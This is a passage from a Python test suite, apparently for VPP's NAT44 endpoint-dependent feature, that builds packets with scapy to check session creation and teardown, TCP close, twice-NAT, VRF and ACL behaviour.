server3_n += 1
self.assertGreater(server1_n, 0)
self.assertEqual(server2_n, 0)
self.assertGreater(server3_n, 0)
def test_syslog_sess(self):
""" NAT44ED Test syslog session creation and deletion """
self.vapi.syslog_set_filter(
self.syslog_severity.SYSLOG_API_SEVERITY_INFO)
self.vapi.syslog_set_sender(self.pg3.local_ip4, self.pg3.remote_ip4)
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=self.tcp_port_in, dport=self.tcp_external_port))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
self.tcp_port_out = capture[0][TCP].sport
capture = self.pg3.get_capture(1)
self.verify_syslog_sess(capture[0][Raw].load)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.nat_add_address(self.nat_addr, is_add=0)
capture = self.pg3.get_capture(1)
self.verify_syslog_sess(capture[0][Raw].load, False)
def test_twice_nat_interface_addr(self):
""" NAT44ED Acquire twice NAT addresses from interface """
flags = self.config_flags.NAT_IS_TWICE_NAT
self.vapi.nat44_add_del_interface_addr(
sw_if_index=self.pg11.sw_if_index,
flags=flags, is_add=1)
# no address in NAT pool
adresses = self.vapi.nat44_address_dump()
self.assertEqual(0, len(adresses))
# configure interface address and check NAT address pool
self.pg11.config_ip4()
adresses = self.vapi.nat44_address_dump()
self.assertEqual(1, len(adresses))
self.assertEqual(str(adresses[0].ip_address),
self.pg11.local_ip4)
self.assertEqual(adresses[0].flags, flags)
# remove interface address and check NAT address pool
self.pg11.unconfig_ip4()
adresses = self.vapi.nat44_address_dump()
self.assertEqual(0, len(adresses))
def test_output_feature_stateful_acl(self):
""" NAT44ED output feature works with stateful ACL """
self.nat_add_address(self.nat_addr)
self.vapi.nat44_interface_add_del_output_feature(
sw_if_index=self.pg1.sw_if_index, is_add=1)
# First ensure that the NAT is working sans ACL
# send packets out2in, no sessions yet so packets should drop
pkts_out2in = self.create_stream_out(self.pg1)
self.send_and_assert_no_replies(self.pg1, pkts_out2in)
# send packets into inside intf, ensure received via outside intf
pkts_in2out = self.create_stream_in(self.pg0, self.pg1)
capture = self.send_and_expect(self.pg0, pkts_in2out, self.pg1,
len(pkts_in2out))
self.verify_capture_out(capture, ignore_port=True)
# send out2in again, with sessions created it should work now
pkts_out2in = self.create_stream_out(self.pg1)
capture = self.send_and_expect(self.pg1, pkts_out2in, self.pg0,
len(pkts_out2in))
self.verify_capture_in(capture, self.pg0)
# Create an ACL blocking everything
out2in_deny_rule = AclRule(is_permit=0)
out2in_acl = VppAcl(self, rules=[out2in_deny_rule])
out2in_acl.add_vpp_config()
# create an ACL to permit/reflect everything
in2out_reflect_rule = AclRule(is_permit=2)
in2out_acl = VppAcl(self, rules=[in2out_reflect_rule])
in2out_acl.add_vpp_config()
# apply as input acl on interface and confirm it blocks everything
acl_if = VppAclInterface(self, sw_if_index=self.pg1.sw_if_index,
n_input=1, acls=[out2in_acl])
acl_if.add_vpp_config()
self.send_and_assert_no_replies(self.pg1, pkts_out2in)
# apply output acl
acl_if.acls = [out2in_acl, in2out_acl]
acl_if.add_vpp_config()
# send in2out to generate ACL state (NAT state was created earlier)
capture = self.send_and_expect(self.pg0, pkts_in2out, self.pg1,
len(pkts_in2out))
self.verify_capture_out(capture, ignore_port=True)
# send out2in again. ACL state exists so it should work now.
# TCP packets with the syn flag set also need the ack flag
for p in pkts_out2in:
if p.haslayer(TCP) and p[TCP].flags & 0x02:
p[TCP].flags |= 0x10
capture = self.send_and_expect(self.pg1, pkts_out2in, self.pg0,
len(pkts_out2in))
self.verify_capture_in(capture, self.pg0)
self.logger.info(self.vapi.cli("show trace"))
def test_tcp_close(self):
""" NAT44ED Close TCP session from inside network - output feature """
old_timeouts = self.vapi.nat_get_timeouts()
new_transitory = 2
self.vapi.nat_set_timeouts(
udp=old_timeouts.udp,
tcp_established=old_timeouts.tcp_established,
icmp=old_timeouts.icmp,
tcp_transitory=new_transitory)
self.vapi.nat44_forwarding_enable_disable(enable=1)
self.nat_add_address(self.pg1.local_ip4)
twice_nat_addr = '10.0.1.3'
service_ip = '192.168.16.150'
self.nat_add_address(twice_nat_addr, twice_nat=1)
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
flags=flags, is_add=1)
self.vapi.nat44_interface_add_del_output_feature(
is_add=1,
sw_if_index=self.pg1.sw_if_index)
flags = (self.config_flags.NAT_IS_OUT2IN_ONLY |
self.config_flags.NAT_IS_TWICE_NAT)
self.nat_add_static_mapping(self.pg0.remote_ip4,
service_ip, 80, 80,
proto=IP_PROTOS.tcp,
flags=flags)
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
start_sessnum = len(sessions)
# SYN packet out->in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=service_ip) /
TCP(sport=33898, dport=80, flags="S"))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
tcp_port = p[TCP].sport
# SYN + ACK packet in->out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=twice_nat_addr) /
TCP(sport=80, dport=tcp_port, flags="SA"))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
# ACK packet out->in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=service_ip) /
TCP(sport=33898, dport=80, flags="A"))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
# FIN packet in -> out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=twice_nat_addr) /
TCP(sport=80, dport=tcp_port, flags="FA", seq=100, ack=300))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
# FIN+ACK packet out -> in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=service_ip) /
TCP(sport=33898, dport=80, flags="FA", seq=300, ack=101))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
# ACK packet in -> out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=twice_nat_addr) /
TCP(sport=80, dport=tcp_port, flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
# session now in transitory timeout
# try SYN packet out->in - should be dropped
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=service_ip) /
TCP(sport=33898, dport=80, flags="S"))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.sleep(new_transitory, "wait for transitory timeout")
self.pg0.assert_nothing_captured(0)
# session should still exist
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - start_sessnum, 1)
# send FIN+ACK packet out -> in - will cause session to be wiped
# but won't create a new session
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=service_ip) /
TCP(sport=33898, dport=80, flags="FA", seq=300, ack=101))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - start_sessnum, 0)
self.pg0.assert_nothing_captured(0)
def test_tcp_session_close_in(self):
""" NAT44ED Close TCP session from inside network """
in_port = self.tcp_port_in
out_port = 10505
ext_port = self.tcp_external_port
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
in_port, out_port, proto=IP_PROTOS.tcp,
flags=self.config_flags.NAT_IS_TWICE_NAT)
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
session_n = len(sessions)
self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
tcp_transitory=2, icmp=5)
self.init_tcp_session(self.pg0, self.pg1, in_port, ext_port)
# FIN packet in -> out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="FA", seq=100, ack=300))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
pkts = []
# ACK packet out -> in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="A", seq=300, ack=101))
pkts.append(p)
# FIN packet out -> in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="FA", seq=300, ack=101))
pkts.append(p)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(2)
# ACK packet in -> out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - session_n, 1)
out2in_drops = self.get_err_counter(
'/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
in2out_drops = self.get_err_counter(
'/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
# extra FIN packet out -> in - this should be dropped
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="FA", seq=300, ack=101))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured()
# extra ACK packet in -> out - this should be dropped
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.assert_nothing_captured()
stats = self.get_err_counter(
'/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
self.assertEqual(stats - out2in_drops, 1)
stats = self.get_err_counter(
'/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
self.assertEqual(stats - in2out_drops, 1)
self.sleep(3)
# extra ACK packet in -> out - this will cause session to be wiped
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.assert_nothing_captured()
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - session_n, 0)
def test_tcp_session_close_out(self):
""" NAT44ED Close TCP session from outside network """
in_port = self.tcp_port_in
out_port = 10505
ext_port = self.tcp_external_port
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
in_port, out_port, proto=IP_PROTOS.tcp,
flags=self.config_flags.NAT_IS_TWICE_NAT)
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
session_n = len(sessions)
self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
tcp_transitory=2, icmp=5)
_ = self.init_tcp_session(self.pg0, self.pg1, in_port, ext_port)
# FIN packet out -> in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="FA", seq=100, ack=300))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
# FIN+ACK packet in -> out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="FA", seq=300, ack=101))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
# ACK packet out -> in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="A", seq=101, ack=301))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - session_n, 1)
out2in_drops = self.get_err_counter(
'/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
in2out_drops = self.get_err_counter(
'/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
# extra FIN packet out -> in - this should be dropped
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="FA", seq=300, ack=101))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured()
# extra ACK packet in -> out - this should be dropped
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.assert_nothing_captured()
stats = self.get_err_counter(
'/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
self.assertEqual(stats - out2in_drops, 1)
stats = self.get_err_counter(
'/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
self.assertEqual(stats - in2out_drops, 1)
self.sleep(3)
# extra ACK packet in -> out - this will cause session to be wiped
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.assert_nothing_captured()
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - session_n, 0)
def test_tcp_session_close_simultaneous(self):
""" NAT44ED Close TCP session from inside network """
in_port = self.tcp_port_in
ext_port = 10505
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
in_port, ext_port, proto=IP_PROTOS.tcp,
flags=self.config_flags.NAT_IS_TWICE_NAT)
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
session_n = len(sessions)
self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
tcp_transitory=2, icmp=5)
out_port = self.init_tcp_session(self.pg0, self.pg1, in_port, ext_port)
# FIN packet in -> out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="FA", seq=100, ack=300))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
# FIN packet out -> in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="FA", seq=300, ack=100))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
# ACK packet in -> out
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
# ACK packet out -> in
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="A", seq=301, ack=101))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - session_n, 1)
out2in_drops = self.get_err_counter(
'/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
in2out_drops = self.get_err_counter(
'/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
# extra FIN packet out -> in - this should be dropped
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port,
flags="FA", seq=300, ack=101))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured()
# extra ACK packet in -> out - this should be dropped
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.assert_nothing_captured()
stats = self.get_err_counter(
'/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
self.assertEqual(stats - out2in_drops, 1)
stats = self.get_err_counter(
'/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
self.assertEqual(stats - in2out_drops, 1)
self.sleep(3)
# extra ACK packet in -> out - this will cause session to be wiped
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=in_port, dport=ext_port,
flags="A", seq=101, ack=301))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.assert_nothing_captured()
sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
self.assertEqual(len(sessions) - session_n, 0)
def test_dynamic_vrf(self):
""" NAT44ED dynamic translation test: different VRF"""
vrf_id_in = 33
vrf_id_out = 34
self.nat_add_address(self.nat_addr, vrf_id=vrf_id_in)
try:
self.configure_ip4_interface(self.pg7, table_id=vrf_id_in)
self.configure_ip4_interface(self.pg8, table_id=vrf_id_out)
self.nat_add_inside_interface(self.pg7)
self.nat_add_outside_interface(self.pg8)
# just basic stuff nothing special
pkts = self.create_stream_in(self.pg7, self.pg8)
self.pg7.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg8.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
pkts = self.create_stream_out(self.pg8)
self.pg8.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg7.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg7)
finally:
self.pg7.unconfig()
self.pg8.unconfig()
self.vapi.ip_table_add_del(is_add=0,
table={'table_id': vrf_id_in})
self.vapi.ip_table_add_del(is_add=0,
table={'table_id': vrf_id_out})
def test_dynamic_output_feature_vrf(self):
""" NAT44ED dynamic translation test: output-feature, VRF"""
# other then default (0)
new_vrf_id = 22
self.nat_add_address(self.nat_addr)
self.vapi.nat44_interface_add_del_output_feature(
sw_if_index=self.pg8.sw_if_index, is_add=1)
try:
self.configure_ip4_interface(self.pg7, table_id=new_vrf_id)
self.configure_ip4_interface(self.pg8, table_id=new_vrf_id)
# in2out
tcpn = self.statistics['/nat44-ed/in2out/slowpath/tcp']
udpn = self.statistics['/nat44-ed/in2out/slowpath/udp']
icmpn = self.statistics['/nat44-ed/in2out/slowpath/icmp']
drops = self.statistics['/nat44-ed/in2out/slowpath/drops']
pkts = self.create_stream_in(self.pg7, self.pg8)
self.pg7.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg8.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
if_idx = self.pg8.sw_if_index
cnt = self.statistics['/nat44-ed/in2out/slowpath/tcp']
self.assertEqual(cnt[:, if_idx].sum() - tcpn[:, if_idx].sum(), 2)
cnt = self.statistics['/nat44-ed/in2out/slowpath/udp']
self.assertEqual(cnt[:, if_idx].sum() - udpn[:, if_idx].sum(), 1)
cnt = self.statistics['/nat44-ed/in2out/slowpath/icmp']
self.assertEqual(cnt[:, if_idx].sum() - icmpn[:, if_idx].sum(), 1)
cnt = self.statistics['/nat44-ed/in2out/slowpath/drops']
self.assertEqual(cnt[:, if_idx].sum() - drops[:, if_idx].sum(), 0)
# out2in
tcpn = self.statistics['/nat44-ed/out2in/fastpath/tcp']
udpn = self.statistics['/nat44-ed/out2in/fastpath/udp']
icmpn = self.statistics['/nat44-ed/out2in/fastpath/icmp']
drops = self.statistics['/nat44-ed/out2in/fastpath/drops']
pkts = self.create_stream_out(self.pg8)
self.pg8.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg7.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg7)
if_idx = self.pg8.sw_if_index
cnt = self.statistics['/nat44-ed/out2in/fastpath/tcp']
self.assertEqual(cnt[:, if_idx].sum() - tcpn[:, if_idx].sum(), 2)
cnt = self.statistics['/nat44-ed/out2in/fastpath/udp']
self.assertEqual(cnt[:, if_idx].sum() - udpn[:, if_idx].sum(), 1)
cnt = self.statistics['/nat44-ed/out2in/fastpath/icmp']
self.assertEqual(cnt[:, if_idx].sum() - icmpn[:, if_idx].sum(), 1)
cnt = self.statistics['/nat44-ed/out2in/fastpath/drops']
self.assertEqual(cnt[:, if_idx].sum() - drops[:, if_idx].sum(), 0)
sessions = self.statistics['/nat44-ed/total-sessions']
self.assertEqual(sessions[:, 0].sum(), 3)
finally:
self.pg7.unconfig()
self.pg8.unconfig()
self.vapi.ip_table_add_del(is_add=0,
table={'table_id': new_vrf_id})
def test_next_src_nat(self):
""" NAT44ED On way back forward packet to nat44-in2out node. """
twice_nat_addr = '10.0.1.3'
external_port = 80
local_port = 8080
post_twice_nat_port = 0
self.vapi.nat44_forwarding_enable_disable(enable=1)
self.nat_add_address(twice_nat_addr, twice_nat=1)
flags = (self.config_flags.NAT_IS_OUT2IN_ONLY |
self.config_flags.NAT_IS_SELF_TWICE_NAT)
self.nat_add_static_mapping(self.pg6.remote_ip4, self.pg1.remote_ip4,
local_port, external_port,
proto=IP_PROTOS.tcp, vrf_id=1,
flags=flags)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg6.sw_if_index,
is_add=1)
p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
IP(src=self.pg6.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=12345, dport=external_port))
self.pg6.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg6.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, twice_nat_addr)
self.assertNotEqual(tcp.sport, 12345)
post_twice_nat_port = tcp.sport
self.assertEqual(ip.dst, self.pg6.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
IP(src=self.pg6.remote_ip4, dst=twice_nat_addr) /
TCP(sport=local_port, dport=post_twice_nat_port))
self.pg6.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg6.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg1.remote_ip4)
self.assertEqual(tcp.sport, external_port)
self.assertEqual(ip.dst, self.pg6.remote_ip4)
self.assertEqual(tcp.dport, 12345)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_one_armed_nat44_static(self):
""" NAT44ED One armed NAT and 1:1 NAPT asymmetrical rule """
remote_host = self.pg4.remote_hosts[0]
local_host = self.pg4.remote_hosts[1]
external_port = 80
local_port = 8080
eh_port_in = 0
self.vapi.nat44_forwarding_enable_disable(enable=1)
self.nat_add_address(self.nat_addr, twice_nat=1)
flags = (self.config_flags.NAT_IS_OUT2IN_ONLY |
self.config_flags.NAT_IS_TWICE_NAT)
self.nat_add_static_mapping(local_host.ip4, self.nat_addr,
local_port, external_port,
proto=IP_PROTOS.tcp, flags=flags)
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg4.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg4.sw_if_index,
flags=flags, is_add=1)
# from client to service
p = (Ether(src=self.pg4.remote_mac, dst=self.pg4.local_mac) /
IP(src=remote_host.ip4, dst=self.nat_addr) /
TCP(sport=12345, dport=external_port))
self.pg4.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg4.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, local_host.ip4)
self.assertEqual(ip.src, self.nat_addr)
self.assertEqual(tcp.dport, local_port)
self.assertNotEqual(tcp.sport, 12345)
eh_port_in = tcp.sport
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service back to client
p = (Ether(src=self.pg4.remote_mac, dst=self.pg4.local_mac) /
IP(src=local_host.ip4, dst=self.nat_addr) /
TCP(sport=local_port, dport=eh_port_in))
self.pg4.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg4.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.nat_addr)
self.assertEqual(ip.dst, remote_host.ip4)
self.assertEqual(tcp.sport, external_port)
self.assertEqual(tcp.dport, 12345)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_icmp_error_fwd_outbound(self):
""" NAT44ED ICMP error outbound with forwarding enabled """
# Ensure that an outbound ICMP error message is properly associated
# with the inbound forward bypass session it is related to.
payload = "H" * 10
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# enable forwarding and initiate connection out2in
self.vapi.nat44_forwarding_enable_disable(enable=1)
p1 = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) /
UDP(sport=21, dport=20) / payload)
self.pg1.add_stream(p1)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)[0]
self.logger.info(self.vapi.cli("show nat44 sessions"))
# reply with ICMP error message in2out
# We cannot reliably retrieve forward bypass sessions via the API.
# session dumps for a user will only look on the worker that the
# user is supposed to be mapped to in2out. The forward bypass session
# is not necessarily created on that worker.
p2 = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
ICMP(type='dest-unreach', code='port-unreachable') /
capture[IP:])
self.pg0.add_stream(p2)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)[0]
self.logger.info(self.vapi.cli("show nat44 sessions"))
self.logger.info(ppp("p1 packet:", p1))
self.logger.info(ppp("p2 packet:", p2))
self.logger.info(ppp("capture packet:", capture))
if __name__ == '__main__':
unittest.main(testRunner=VppTestRunner)
| 39.698413
| 79
| 0.5728
| 19,744
| 152,561
| 4.176357
| 0.03206
| 0.03506
| 0.026013
| 0.029724
| 0.856448
| 0.82334
| 0.79364
| 0.769798
| 0.749218
| 0.729086
| 0
| 0.034971
| 0.32505
| 152,561
| 3,842
| 80
| 39.708745
| 0.765818
| 0.047791
| 0
| 0.757297
| 0
| 0
| 0.031417
| 0.010249
| 0
| 0
| 0.000691
| 0
| 0.101206
| 1
| 0.027284
| false
| 0
| 0.005076
| 0.001904
| 0.041244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
